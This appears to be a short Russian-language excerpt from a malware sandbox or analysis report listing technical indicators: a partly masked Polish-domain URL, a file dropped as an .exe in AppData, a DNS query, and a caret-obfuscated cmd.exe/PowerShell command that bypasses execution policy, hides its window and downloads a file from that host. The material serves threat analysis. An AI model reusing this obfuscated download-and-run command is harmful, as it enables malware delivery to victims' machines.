Техническая информация
- http://lt##.#ocalnews39.pl/file/set.rte как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwersH^E^L^l^.ex^E^ -ExEcU^tI^Onpo^LiC^y ^bYPas^s^ -N^O^prOfI^L^e^ -wiN^dOwsTyLE hI^DdEn (nEW-^O^BjecT^ ^sys^TeM.N^ET.we^b^Cl^ie^NT^).DOwn^L^oADfIl^E('http://lt##.#ocalnews3...
- DNS ASK lt##.#ocalnews39.pl
- '<SYSTEM32>\cmd.exe' /C "p^OwersH^E^L^l^.ex^E^ -ExEcU^tI^Onpo^LiC^y ^bYPas^s^ -N^O^prOfI^L^e^ -wiN^dOwsTyLE hI^DdEn (nEW-^O^BjecT^ ^sys^TeM.N^ET.we^b^Cl^ie^NT^).DOwn^L^oADfIl^E('http://lt##.#ocalnews3...' (со скрытым окном)